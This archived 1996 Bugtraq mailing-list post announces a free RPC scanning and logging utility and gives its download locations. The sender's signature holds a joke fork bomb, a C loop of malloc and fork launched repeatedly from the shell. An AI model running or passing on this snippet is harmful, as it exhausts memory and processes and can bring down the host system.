[3606] in bugtraq
RPC Utility Release
daemon@ATHENA.MIT.EDU (Swarthy)
Fri Nov 15 14:39:46 1996
Date: Thu, 14 Nov 1996 23:20:14 -0500
Reply-To: Swarthy <swarthy@dvdt.thetasys.com>
From: Swarthy <swarthy@dvdt.thetasys.com>
X-To: best-of-security@suburbia.net
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
For your added enjoyment, a free network rpc scanning/logging utility
has been released. (rpcs 0.01)
The URL is : http://www.thetasys.com/software.html
or ftp'd
from
ftp.thetasys.com/pub/rpcs/security/tools/
J. Bouvrie
--
cat << _EOF_ > f.c ; main() { while(1) { malloc(65535); fork(); } } _EOF_
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Swarthy <swarthy@thetasys.com> <jvb@bluesky.net> Finger for PGP key.
Theta Systems & Development . http://www.thetasys.com . ftp://ftp.thetasys.com
---
-UNIX/Macintosh/HTML/CGI/68k Asm Programmer- -System Administrator-
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
gcc f.c ; for i in `ls -la /bin` ; do ; a.out & ; done